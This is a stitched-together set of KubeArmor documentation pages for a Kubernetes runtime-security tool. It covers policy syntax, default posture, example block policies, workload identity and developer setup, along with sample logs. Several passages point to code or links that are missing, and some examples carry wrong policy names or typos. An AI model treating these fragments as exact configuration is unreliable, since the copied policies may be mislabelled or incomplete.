== Alert / 2023-01-04 04:58:37.689182 ==
== Log / 2023-01-27 14:41:49.017709 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/dockerd
Resource: /usr/bin/runc --version
Operation: Process
Data: syscall=SYS_EXECVE
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.018951 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/runc --version
Resource: /lib/x86_64-linux-gnu/libc.so.6
Operation: File
Data: syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.018883 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/runc --version
Resource: /etc/ld.so.cache
Operation: File
Data: syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.020905 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/k3s
Resource: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/portmap
Operation: Process
Data: syscall=SYS_EXECVE
Result: Passed
HostPID: 193090
HostPPID: 5627
PID: 193090
PPID: 5627
ParentProcessName: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/k3s
ProcessName: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/portmap
kubectl describe ns wordpress-mysql | grep kubearmor-visibility
kubearmor-visibility: process, file, network, capabilities
kubectl annotate ns wordpress-mysql kubearmor-visibility=network --overwrite
"namespace/wordpress-mysql annotated"
karmor logs --logFilter=all -n wordpress-mysql
POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
# ls
POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
#apt
Here is the specification of a Cluster security policy.
apiVersion: security.kubearmor.com/v1
kind:KubeArmorClusterPolicy
metadata:
name: [policy name]
namespace: [namespace name] # --> optional
spec:
severity: [1-10] # --> optional
tags: ["tag", ...] # --> optional
message: [message] # --> optional
selector:
matchExpressions:
- key: [namespace|label]
operator: [In|NotIn]
values:
- [namespaces|labels]
process:
matchPaths:
- path: [absolute executable path]
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchPatterns:
- pattern: [regex pattern]
ownerOnly: [true|false] # --> optional
file:
matchPaths:
- path: [absolute file path]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchPatterns:
- pattern: [regex pattern]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
network:
matchProtocols:
- protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
fromSource: # --> optional
- path: [absolute exectuable path]
capabilities:
matchCapabilities:
- capability: [capability name]
fromSource: # --> optional
- path: [absolute exectuable path]
syscalls:
matchSyscalls:
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute exectuable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
matchPaths:
- path: [absolute directory path | absolute exectuable path]
recursive: [true|false] # --> optional
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute exectuable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
action: [Allow|Audit|Block] (Block by default)
Note Please note that for system calls monitoring we only support audit action no matter what the value of action is
Now, we will briefly explain how to define a cluster security policy.
A cluster security policy starts with the base information such as apiVersion, kind, and metadata. The apiVersion would be the same in any security policies. In the case of metadata, you need to specify the names of a policy and a namespace where you want to apply the policy and kind would be KubeArmorClusterPolicy.
apiVersion: security.kubearmor.com/v1
kind:KubeArmorClusterPolicy
metadata:
name: [policy name]
namespace: [namespace name]
The severity part is somewhat important. You can specify the severity of a given policy from 1 to 10. This severity will appear in alerts when policy violations happen.
severity: [1-10]
The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.
tags: ["tag1", ..., "tagN"]
The message part is optional. You can add an alert message, and then the message will be presented in alert logs.
message: [message]
In the selector section for cluster-based policies, we use matchExpressions to define the namespaces where the policy should be applied and labels to select/deselect the workloads in those namespaces. Currently, only namespaces and labels can be matched, so the key should be 'namespace' and 'label'. The operator will determine whether the policy should apply to the namespaces and its workloads specified in the values field or not. Both matchExpressions
, namespace
and label
are an ANDed operation.
Operator: In
When the operator is set to In, the policy will be applied only to the namespaces listed and if label matchExpressions
is defined, the policy will be applied only to the workloads that match the labels in the values field.
Operator: NotIn
When the operator is set to NotIn, the policy will be applied to all other namespaces except those listed in the values field and if label matchExpressions
is defined, the policy will be applied to all the workloads except that match the labels in the values field.
selector:
matchExpressions:
- key: namespace
operator: [In|NotIn]
values:
- [namespaces]
- key: label
operator: [In|NotIn]
values:
- [label] # string format eg. -> (app=nginx)
TIP If the selector operator is omitted in the policy, it will be applied across all namespaces.
In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. In the case of matchPatterns, advanced operators may be able to determine particular patterns for executables by using regular expressions. However, the coverage of regular expressions is highly dependent on AppArmor (Policy Core Reference). Thus, we generally do not recommend using this match.
process:
matchPaths:
- path: [absolute executable path]
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchPatterns:
- pattern: [regex pattern]
ownerOnly: [true|false] # --> optional
In each match, there are three options.
ownerOnly (static action: allow owner only; otherwise block all)
If this is enabled, the owners of the executable(s) defined with matchPaths and matchDirectories will be only allowed to execute.
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.
fromSource
If a path is specified in fromSource, the executable at the path will be allowed/blocked to execute the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy as follows. Then, /bin/bash will be only allowed (blocked) to execute /bin/sleep. Otherwise, the execution of /bin/sleep will be blocked (allowed).
process:
matchPaths:
- path: /bin/sleep
fromSource:
- path: /bin/bash
The file section is quite similar to the process section.
file:
matchPaths:
- path: [absolute file path]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute file path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute file path]
matchPatterns:
- pattern: [regex pattern]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
The only difference between 'process' and 'file' is the readOnly option.
readOnly (static action: allow to read only; otherwise block all)
If this is enabled, the read operation will be only allowed, and any other operations (e.g., write) will be blocked.
In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.
network:
matchProtocols:
- protocol: [protocol] # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
fromSource: # --> optional
- path: [absolute file path]
In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check available capabilities in Capability List.
capabilities:
matchCapabilities:
- capability: [capability name]
fromSource: # --> optional
- path: [absolute file path]
In the case of syscalls, there are two types of matches, matchSyscalls and matchPaths. matchPaths can be used to target system calls targeting specific binary path or anything under a specific directory, additionally you can slice based on syscalls generated by a binary or a group of binaries in a directory. You can use matchSyscall as a more general rule to match syscalls from all sources or from specific binaries.
syscalls:
matchSyscalls:
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute exectuable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
matchPaths:
- path: [absolute directory path | absolute exectuable path]
recursive: [true|false] # --> optional
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute exectuable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
There is one options in each match.
fromSource
If a path is specified in fromSource, kubearmor will match only syscalls generated by the defined source. For better undrestanding, lets take the example below. Only unlink system calls generated by /bin/bash
will be matched.
process:
matchPaths:
- path: /bin/sleep
- syscall:
- unlink
fromSource:
- path: /bin/bash
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory.
Action
The action could be Allow, Audit, or Block. Security policies would be handled in a blacklist manner or a whitelist manner according to the action. Thus, you need to define the action carefully. You can refer to Consideration in Policy Action for more details. In the case of the Audit action, we can use this action for policy verification before applying a security policy with the Block action. For System calls monitoring, we only support audit mode no matter what the action is set to.
action: [Allow|Audit|Block]
KubeArmor supports configurable default security posture. The security posture could be allow/audit/deny. Default Posture is used when there's atleast one Allow
policy for the given deployment i.e. KubeArmor is handling policies in whitelisting manner (more about this in Considerations in Policy Action ).
There are two default mode of operations available block
and audit
. block
mode blocks all the operations that are not allowed in the policy. audit
generates telemetry events for operations that would have been blocked otherwise.
KubeArmor has 4 types of resources: Process, File, Network and Capabilities. Default Posture is configurable for each of the resources seperately except Process. Process based operations are treated under File resource only.
Note By default, KubeArmor set the Global default posture to
audit
Global default posture is configured using configuration options passed to KubeArmor using configuration file
defaultFilePosture: block # or audit
defaultNetworkPosture: block # or audit
defaultCapabilitiesPosture: block # or audit
Or using command line flags with the KubeArmor binary
-defaultFilePosture string
configuring default enforcement action in global file context [audit,block] (default "block")
-defaultNetworkPosture string
configuring default enforcement action in global network context [audit,block] (default "block")
-defaultCapabilitiesPosture string
configuring default enforcement action in global capability context [audit,block] (default "block")
We use namespace annotations to configure default posture per namespace. Supported annotations keys are kubearmor-file-posture
,kubearmor-network-posture
and kubearmor-capabilities-posture
with values block
or audit
. If a namespace is annotated with a supported key and an invalid value ( like kubearmor-file-posture=invalid
), KubeArmor will update the value with the global default posture ( i.e. to kubearmor-file-posture=block
).
Let's start KubeArmor with configuring default network posture to audit in the following YAML.
sudo env KUBEARMOR_CFG=/path/to/kubearmor.yaml ./kubearmor
Contents of kubearmor.yaml
defaultNetworkPosture: audit
Here's a sample policy to allow tcp
connections from curl
binary.
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-5-net-tcp-allow-curl
namespace: multiubuntu
spec:
severity: 8
selector:
matchLabels:
container: ubuntu-5
network:
matchProtocols:
- protocol: tcp
fromSource:
- path: /usr/bin/curl
action:
Allow
Note: This example is in the multiubuntu environment.
Inside the ubuntu-5-deployment
, if we try to access tcp
using curl
. It works as expected with no telemetry generated.
root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl 142.250.193.46
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
If we try to access udp
using curl
, a bunch of telemetry is generated for the udp
access.
root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl google.com
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
curl google.com
requires UDP for DNS resolution.
Generated alert has Policy Name DefaultPosture
and Action as Audit
== Alert / 2022-03-21 12:56:32.999475 ==
Cluster Name: default
Host Name: kubearmor-dev-all
Namespace Name: multiubuntu
Pod Name: ubuntu-5-deployment-7778f46c67-hk6k6
Container ID: 1f92eb4c9d730862174be04f319763a2c1ac2752669807051c42ddc78aa102d1
Container Name: ubuntu-5-container
Policy Name: DefaultPosture
Type: MatchedPolicy
Source: /usr/bin/curl google.com
Operation: Network
Resource: domain=AF_INET6 type=SOCK_DGRAM protocol=0
Data: syscall=SYS_SOCKET
Action: Audit
Result: Passed
Now let's update the default network posture to block for multiubuntu
namespace.
~❯❯❯ kubectl annotate ns multiubuntu kubearmor-network-posture=block
namespace/multiubuntu annotated
Now if we try to access udp
using curl
, the action is blocked and related alerts are generated.
root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl google.com
curl: (6) Could not resolve host: google.com
Here curl couldn't resolve google.com due to blocked access to UDP.
Generated alert has Policy Name DefaultPosture
and Action as Block
== Alert / 2022-03-21 13:06:27.731918 ==
Cluster Name: default
Host Name: kubearmor-dev-all
Namespace Name: multiubuntu
Pod Name: ubuntu-5-deployment-7778f46c67-hk6k6
Container ID: 1f92eb4c9d730862174be04f319763a2c1ac2752669807051c42ddc78aa102d1
Container Name: ubuntu-5-container
Policy Name: ksp-ubuntu-5-net-tcp-allow
Severity: 8
Type: MatchedPolicy
Source: /usr/bin/curl google.com
Operation: Network
Resource: domain=AF_INET6 type=SOCK_DGRAM protocol=0
Data: syscall=SYS_SOCKET
Action: Allow
Result: Permission denied
Let's try to set the annotation value to something invalid.
~❯❯❯ kubectl annotate ns multiubuntu kubearmor-network-posture=invalid --overwrite
namespace/multiubuntu annotated
~❯❯❯ kubectl describe ns multiubuntu
Name: multiubuntu
Labels: kubernetes.io/metadata.name=multiubuntu
Annotations: kubearmor-network-posture: audit
Status: Active
We can see that, annotation value was automatically updated to audit since that was global mode of operation for network in the KubeArmor configuration.
Here, we demonstrate how to define a cluster security policies.
Process Execution Restriction
Block a specific executable - In operator (csp-in-operator-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
name: csp-in-operator-block-process
spec:
severity: 8
selector:
matchExpressions:
- key: namespace
operator: In
values:
- nginx1
process:
matchPaths:
- path: /usr/bin/apt
action:
Block
Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in the containers present in the namespace nginx1. For this, we define the 'nginx1' value and operator as 'In' in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is blocked.
Block a specific executable - NotIn operator(csp-not-in-operator-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
name: csp-in-operator-block-process
spec:
severity: 8
selector:
matchExpressions:
- key: namespace
operator: NotIn
values:
- nginx1
process:
matchPaths:
- path: /usr/bin/apt
action:
Block
Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in all containers present in the cluster except that are in the namespace nginx1. For this, we define the 'nginx1' value and operator as 'NotIn' in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is not blocked. Now try running same command in container inside 'nginx2' namespace and it should not be blocked.
Block a specific executable matching labels, In operator- In operator (csp-matchlabels-in-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
name: csp-matchlabels-in-block-process
spec:
severity: 8
selector:
matchExpressions:
- key: namespace
operator: In
values:
- nginx1
- key: label
operator: In
values:
- app=nginx
- app=nginx-dev
process:
matchPaths:
- path: /usr/bin/apt
action:
Block
Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in the workloads who match the labels app=nginx
OR app=nginx-dev
present in the namespace nginx1
. For this, we define the 'nginx1' as value and operator as 'In' for key namespace
AND app=nginx
& app=nginx-dev
value and operator as 'In' for key label
in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is blocked. apt
won't be blocked in a workload that doesn't have labels app=nginx
OR app=nginx-dev
in namespace nginx1
and all the workloads across other namespaces.
Block accessing specific executable matching labels, NotIn operator (csp-matchlabels-not-in-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
name: csp-matchlabels-not-in-block-process
spec:
severity: 8
selector:
matchExpressions:
- key: namespace
operator: NotIn
values:
- nginx2
- key: label
operator: NotIn
values:
- app=nginx
process:
matchPaths:
- path: /usr/bin/apt
action:
Block
Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in all the workloads who doesn't match the labels app=nginx
AND not present in the namespace nginx2
. For this, we define the 'nginx2' as value and operator as 'NotIn' for key namespace
AND app=nginx
value and operator as 'NotIn' for key label
in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please exec into any container within the namespace 'nginx2' and run '/usr/bin/apt'. You can see the operation is blocked. Then try to do same in other workloads present in different namespace and if they don't have label app=nginx
, the operation will be blocked, in case container have label app=nginx
, operation won't be blocked.
File Access Restriction
Block accessing specific file (csp-in-operator-block-file-access.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
name: csp-in-operator-block-file-access
spec:
severity: 8
selector:
matchExpressions:
- key: namespace
operator: NotIn
values:
- nginx2
file:
matchPaths:
- path: /etc/host.conf
fromSource:
- path: /usr/bin/cat
action:
Block
Explanation: The purpose of this policy is to block read access for '/etc/host.conf' in all the containers except the namespace 'bginx2'.
Verification: After applying this policy, please get into the container within the namespace 'nginx2' and run 'cat /etc/host.conf'. You can see the operation is not blocked and can see the content of the file. Now try to run 'cat /etc/host.conf' in container of 'nginx1' namespace, this operation should be blocked.
Note Other operations like Network, Capabilities, Syscalls also behave in same way as in security policy. The difference only lies in how we match the cluster policy with the namespaces.
Welcome back to the KubeArmor tutorial! In the previous chapter, we learned about KubeArmor's Security Policies (KSP, HSP, CSP) and how they define rules for what applications and processes are allowed or forbidden to do. We saw that these policies use selectors (like labels and namespaces) to tell KubeArmor which containers, pods, or nodes they should apply to.
But how does KubeArmor know which policy to apply when something actually happens, like a process trying to access a file? When an event occurs deep within the operating system (like a process accessing /etc/shadow
), the system doesn't just say "a pod with label app=my-web-app
did this". It provides low-level details like Process IDs (PID), Parent Process IDs (PPID), and Namespace IDs (like PID Namespace and Mount Namespace).
This is where the concept of Container/Node Identity comes in.
Think of Container/Node Identity as KubeArmor's way of answering the question: "Who is doing this?".
When a system event happens on a node – maybe a process starts, a file is opened, or a network connection is attempted – KubeArmor intercepts this event. The event data includes technical details about the process that triggered it. KubeArmor needs to take these technical details and figure out if the process belongs to:
A specific Container (which might be part of a Kubernetes Pod or a standalone Docker container).
Or, the Node itself (the underlying Linux operating system, potentially running processes outside of containers).
Once KubeArmor knows who is performing the action (the specific container or node), it can then look up the relevant security policies that apply to that identity and decide whether to allow, audit, or block the action.
Imagine you have a KubeArmorPolicy (KSP) that says: "Block any attempt by containers with the label app: sensitive-data
to read the file /sensitive/config
.":
Now, suppose a process inside one of your containers tries to open /sensitive/config
.
Without Identity: KubeArmor might see an event like "Process with PID 1234 and Mount Namespace ID 5678 tried to read /sensitive/config". Without knowing which container PID 1234 and MNT NS 5678 belong to, KubeArmor can't tell if this process is running in a container labeled app: sensitive-data
. It wouldn't know which policy applies!
With Identity: KubeArmor sees the event, looks up PID 1234 and MNT NS 5678 in its internal identity map, and discovers "Ah, that PID and Namespace belong to Container ID abc123def456...
which is part of Pod my-sensitive-pod-xyz
in namespace default
, and that pod has the label app: sensitive-data
." Now it knows this event originated from a workload targeted by the block-sensitive-file-read
policy. It can then apply the Block
action.
So, identifying the workload responsible for a system event is fundamental to enforcing policies correctly.
KubeArmor runs as a DaemonSet on each node in your Kubernetes cluster (or directly on a standalone Linux server). This daemon is responsible for monitoring system activity on that specific node. To connect these low-level events to higher-level workload identities (like Pods or Nodes), KubeArmor does a few things:
Watching Kubernetes (for K8s environments): The KubeArmor daemon watches the Kubernetes API Server for events related to Pods and Nodes. When a new Pod starts, KubeArmor gets its details:
Pod Name
Namespace Name
Labels (this is key for policy selectors!)
Container details (Container IDs, Image names)
Node Name where the Pod is scheduled. KubeArmor stores this information.
Interacting with Container Runtimes: KubeArmor talks to the container runtime (like Docker or containerd) running on the node. It uses the Container ID (obtained from Kubernetes or by watching runtime events) to get more low-level details:
Container PID (the process ID of the main process inside the container as seen from the host OS).
Container Namespace IDs (specifically the PID Namespace ID and Mount Namespace ID). These IDs are crucial because system events are often reported with these namespace identifiers.
Monitoring Host Processes: KubeArmor also monitors processes running directly on the host node (outside of containers).
KubeArmor builds and maintains an internal map that links these low-level identifiers (like PID Namespace ID + Mount Namespace ID) to the corresponding higher-level identities (Container ID, Pod Name, Namespace, Node Name, Labels).
Let's visualize how this identity mapping happens and is used:
This diagram shows the two main phases:
Identity Discovery: KubeArmor actively gathers information from Kubernetes and the container runtime to build its understanding of which system identifiers belong to which workloads.
Event Correlation: When a system event occurs, KubeArmor uses the identifiers from the event (like Namespace IDs) to quickly look up the corresponding workload identity in its map.
The KubeArmor code interacts with Kubernetes and Docker/containerd to get this identity information.
For Kubernetes environments, KubeArmor's k8sHandler
watches for Pod and Node events:
This snippet shows that KubeArmor isn't passively waiting; it actively watches the Kubernetes API for changes using standard Kubernetes watch mechanisms. When a Pod is added, updated, or deleted, KubeArmor receives an event and updates its internal state.
For Docker (and similar logic exists for containerd), KubeArmor's dockerHandler
can inspect running containers to get detailed information:
This function is critical. It takes a containerID
and retrieves its associated Namespace IDs (PidNS
, MntNS
) by reading special files in the /proc
filesystem on the host, which link the host PID to the namespaces it belongs to. It also retrieves labels and other useful information directly from the container runtime's inspection data.
This collected identity information is stored internally. For example, the SystemMonitor
component maintains a map (NsMap
) to quickly look up a workload based on Namespace IDs:
These functions from processTree.go
show how KubeArmor builds and uses the core identity mapping: it stores the relationship between Namespace IDs (found in system events) and the Container ID, allowing it to quickly identify which container generated an event.
KubeArmor primarily identifies workloads using the following:
This allows KubeArmor to apply the correct security policies, whether they are KSPs (targeting Containers/Pods based on labels/namespaces) or HSPs (targeting Nodes based on node labels).
Understanding Container/Node Identity is key to grasping how KubeArmor works. It's the crucial step where KubeArmor translates low-level system events into the context of your application workloads (containers in pods) or your infrastructure (nodes). By maintaining a map of system identifiers to workload identities, KubeArmor can accurately determine which policies apply to a given event and enforce your desired security posture.
In the next chapter, we'll look at the component that takes this identified event and the relevant policy and makes the decision to allow, audit, or block the action.
Note Skip the steps for the vagrant setup if you're directly compiling KubeArmor on the Linux host. Proceed to setup K8s on the same host by resolving any dependencies.
Requirements
Here is the list of requirements for a Vagrant environment
Clone the KubeArmor github repository in your system
Install Vagrant and VirtualBox in your environment, go to the vagrant path and run the setup.sh file
VM Setup using Vagrant
Now, it is time to prepare a VM for development.
To create a vagrant VM
Output will show up as ...
To get into the vagrant VM
Output will show up as ...
To destroy the vagrant VM
VM Setup using Vagrant with Ubuntu 21.10 (v5.13)
To use the recent Linux kernel v5.13 for dev env, you can run make
with the NETNEXT
flag set to 1
for the respective make option.
You can also make the setting static by changing NETNEXT=0
to NETNEXT=1
in the Makefile.
Requirements
Here is the list of minimum requirements for self-managed Kubernetes.
KubeArmor is designed for Kubernetes environment. If Kubernetes is not setup yet, please refer to . KubeArmor leverages CRI (Container Runtime Interfaces) APIs and works with Docker or Containerd or CRIO based container runtimes. KubeArmor uses LSMs for policy enforcement; thus, please make sure that your environment supports LSMs (either AppArmor or bpf-lsm). Otherwise, KubeArmor will operate in Audit-Mode with no policy "enforcement" support.
Alternative Setup
You can try the following alternative if you face any difficulty in the above Kubernetes (kubeadm) setup.
Note Please make sure to set up the alternative k8s environment on the same host where the KubeArmor development environment is running.
K3s
You can also develop and test KubeArmor on K3s instead of the self-managed Kubernetes. Please follow the instructions in .
MicroK8s
You can also develop and test KubeArmor on MicroK8s instead of the self-managed Kubernetes. Please follow the instructions in .
No Support - Docker Desktops
KubeArmor does not work with Docker Desktops on Windows and macOS because KubeArmor integrates with Linux-kernel native primitives (including LSMs).
Development Setup
In order to install all dependencies, please run the following command.
will automatically install , , , and some other dependencies.
Now, you are ready to develop any code for KubeArmor. Enjoy your journey with KubeArmor.
Compilation
Check if KubeArmor can be compiled on your environment without any problems.
If you see any error messages, please let us know the issue with the full error messages through #kubearmor-development channel on CNCF slack.
Execution
In order to directly run KubeArmor in a host (not as a container), you need to run a local proxy in advance.
Then, run KubeArmor on your environment.
Note If you have followed all the above steps and still getting the warning
The node information is not available
, then this could be due to the case-sensitivity discrepancy in the actual hostname (obtained by runninghostname
) and the hostname used by Kubernetes (underkubectl get nodes -o wide
). K8s converts the hostname to lowercase, which results in a mismatch with the actual hostname. To resolve this, change the hostname to lowercase using the commandhostnamectl set-hostname <lowercase-hostname>
.
KubeArmor Controller
Starting from KubeArmor v0.11 - annotations, container policies, and host policies are handled via kubearmor controller, the controller code can be found under pkg/KubeArmorController
.
To install the controller from KubeArmor docker repository run
To install the controller (local version) to your cluster run
if you need to setup a local registry to push you image, use docker-registry.sh
script under ~/KubeArmor/contribution/local-registry
directory
Here, we briefly give you an overview of KubeArmor's directories.
Source code for KubeArmor (/KubeArmor)
Source code for KubeArmor Controller (CRD)
Deployment tools and files for KubeArmor
Files for testing
KubeArmor supports attack prevention, not just observability and monitoring. More importantly, the prevention is handled inline: even before a process is spawned, a rule can deny execution of a process. Most other systems typically employ "post-attack mitigation" that kills a process/pod after malicious intent is observed, allowing an attacker to execute code on the target environment. Essentially KubeArmor uses inline mitigation to reduce the attack surface of a pod/container/VM. KubeArmor leverages best of breed Linux Security Modules (LSMs) such as AppArmor, BPF-LSM, and SELinux (only for host protection) for inline mitigation. LSMs have several advantages over other techniques:
KubeArmor does not change anything with the pod/container.
KubeArmor does not require any changes at the host level or at the CRI (Container Runtime Interface) level to enforce blocking rules. KubeArmor deploys as a non-privileged DaemonSet with certain capabilities that allows it to monitor other pods/containers and the host.
A given cluster can have multiple nodes utilizing different LSMs. KubeArmor abstracts away complexities of LSMs and provides an easy way to enforce policies. KubeArmor manages complexity of LSMs under-the-hood.
Post-exploit Mitigation works by killing a suspicious process in response to an alert indicating malicious intent.
Attacker is allowed to execute a binary. Attacker could disable security controls, access logs, etc to circumvent attack detection.
By the time a malicious process is killed, sensitive contents could have already been deleted, encrypted, or transmitted.
, “post-exploitation detection/mitigation is at the mercy of an exploit writer putting little to no effort into avoiding tripping these detection mechanisms.”
allows one to specify or policies.
This approach has multiple problems:
It is often difficult to predict which LSM (AppArmor or SELinux) would be available on the target node.
BPF-LSM is not supported by Pod Security Context.
It is difficult to manually specify an AppArmor or SELinux policy. Changing default AppArmor or SELinux policies might result in more security holes since it is difficult to decipher the implications of the changes and can be counter-productive.
Different managed cloud providers use different default distributions. Google GKE COS uses AppArmor by default, AWS Bottlerocket uses BPF-LSM and SELinux, and AWS Amazon Linux 2 uses only SELinux by default. Thus it is challenging to use Pod Security Context in multi-cloud deployments.
References:
Vagrant - v2.2.9
VirtualBox - v6.1
$ git clone https://github.com/kubearmor/KubeArmor.git
$ cd KubeArmor/contribution/vagrant
~/KubeArmor/contribution/vagrant$ ./setup.sh
~/KubeArmor/contribution/vagrant$ sudo reboot
~/KubeArmor/KubeArmor$ make vagrant-up
~/KubeArmor/KubeArmor$ make vagrant-ssh
~/KubeArmor/KubeArmor$ make vagrant-destroy
~/KubeArmor/KubeArmor$ make vagrant-up NETNEXT=1
~/KubeArmor/KubeArmor$ vi Makefile
OS - Ubuntu 18.04
Kubernetes - v1.19
Docker - 18.09 or Containerd - 1.3.7
Linux Kernel - v4.15
LSM - AppArmor
$ cd KubeArmor/contribution/self-managed-k8s
~/KubeArmor/contribution/self-managed-k8s$ ./setup.sh
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make
$ kubectl proxy &
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make run
$ cd KubeArmor/pkg/KubeArmorController
~/KubeArmor/pkg/KubeArmorController$ make deploy
$ cd KubeArmor/pkg/KubeArmorController
~/KubeArmor/pkg/KubeArmorController$ make docker-build deploy
KubeArmor/
BPF - eBPF code for system monitor
common - Libraries internally used
config - Configuration loader
core - The main body (start point) of KubeArmor
enforcer - Runtime policy enforcer (enforcing security policies into LSMs)
feeder - gRPC-based feeder (sending audit/system logs to a log server)
kvmAgent - KubeArmor VM agent
log - Message logger (stdout)
monitor - eBPF-based system monitor (mapping process IDs to container IDs)
policy - gRPC service to manage Host Policies for VM environments
types - Type definitions
protobuf/ - Protocol buffer
pkg/KubeArmorController/ - KubeArmorController generated by Kube-Builder for KubeArmor Annotations, KubeArmorPolicy and KubeArmorHostPolicy
deployments/
<cloud-platform-name> - Deployments specific to respective cloud platform (deprecated - use karmor install or helm)
